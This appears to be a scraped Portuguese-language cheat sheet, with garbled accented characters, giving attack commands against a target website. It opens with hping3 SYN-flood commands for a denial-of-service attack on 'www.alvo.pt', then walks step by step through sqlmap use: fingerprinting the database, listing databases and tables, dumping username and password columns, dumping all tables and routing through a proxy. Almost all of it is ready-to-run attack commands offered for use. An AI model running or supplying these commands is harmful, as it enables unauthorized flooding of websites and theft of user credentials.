Você está na página 1de 3

Instalar o hping3:

sudo apt-get install hping3

Iniciar ataque embora o flood gasta a internet toda:


sudo hping3 -S -s 80 -p 80 --flood www.alvo.pt

Mesmo comando mas com os numero de pacotes controlado:


sudo hping3 -S -s 80 -p 80 -i u200 www.alvo.pt
neste caso foram 200 pacotes mas pode ser outro numero.

-------------------------------------------------
SQLMAP------------------------------------------------------

Menu do sqlmap comando


C�digo:
./sqlmap.py -h

*Lembrar de dar permiss�o de execu��o, ou executar python sqlmap.py -h

Ser� mostrado um menu com v�rias op��es.

------

descobrir qual tipo e vers�o do banco de dados determinado site est� usando.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" -b

�url: A url do alvo.


-b: Pega o banner do DBMS.

Sqli � um tipo de ataque que a cada etapa vamos obtendo mais informa��es, agora que
sabemos a vers�o e o tipo de banco de dados, vamos obter o nome do banco de dados
atual, isso �, o banco de dados que est� sendo usado no site alvo.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" --current-db

�current-db: Mostra o banco de dados atual.

---------

Pode ser que existam mais bancos de dados, ent�o vamos verificar.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" --dbs

�dbs: Lista os bancos de dados do DBMS.


Resultado:

----------

Mostrar as tabelas.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" -D acuart
--tables

�url: Url do alvo.


-D:banco de dados alvo.
�tables:lista as tabelas.

----------

Vamos supor que voc� ache que tem algo interessante na tabela users, hora de listar
as colunas.
C�digo:

./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" -D acuart -T


users --columns

�url:URL Alvo.
-D:Banco de dados alvo.
-T:Tabela alvo.
�columns:Listar colunas.

----------

Finalmente vamos agora extrair os dados das colunas que achamos interessantes.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" -D acuart -T
users -C 'uname,pass' --dump

�url: URL alvo.


-D:Banco de dados alvo.
-T:Tabela do Alvo.
-C: Colunas do alvo
�dump: Extrair informa��es.

----------
Isso � o b�sico dos comandos, vou mostrar agora alguns comandos adicionais.

Excluir do ataque o banco de dados do sistema. Sempre que voc� ver que o sqlmap
est� fazendo consultas ao banco de dados information_schema, voc� pode se desejar
acrescentar �exclude-sysdbs, que vai fazer o sqlmap n�o fazer queries a esse banco.

----------

�proxy : Ativa o uso de proxy.


C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" --dbs
--proxy=http://173.203.80.108:80

----------

Extrair tudo de todas as tabelas.


C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" -D acuart
--tables --dump-all

----------

Usando uma string para tornar o Blind SQL Injection mais eficiente. O teste mais
comum para saber se uma url � vulner�vel a blind SQLI � verificar se o conte�do
muda ap�s uma query maliciosa, fornecer uma palavra que existe na p�gina ajuda o
sqlmap a fazer um teste mais eficiente.
C�digo:

./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" --current-db


--string "shore"

Selecionando o par�metro a ser testado. Voc� pode se deparar com uma p�gina com
v�rios par�metros a serem testados, por exemplo
index.php?option=com_jcars&view=browse&start=15&li
mit=5&sort=brand&updn=ASC&filter?id=12
O sqlmap interpreta cada = como um possivel campo a enviar os testes, mas se voc�
sabe que o par�metro id � o vulner�vel, voc� pode especificar logo, em vez de
esperar o sqlmap testar todos.
C�digo:

./sqlmap.py --url "http://www.sitealvo.com/index.php?


option=com_jcars&view=browse&start=15&limit=5&sort=brand&updn=ASC&filter?id=12"
--current-db -p "id"

Você também pode gostar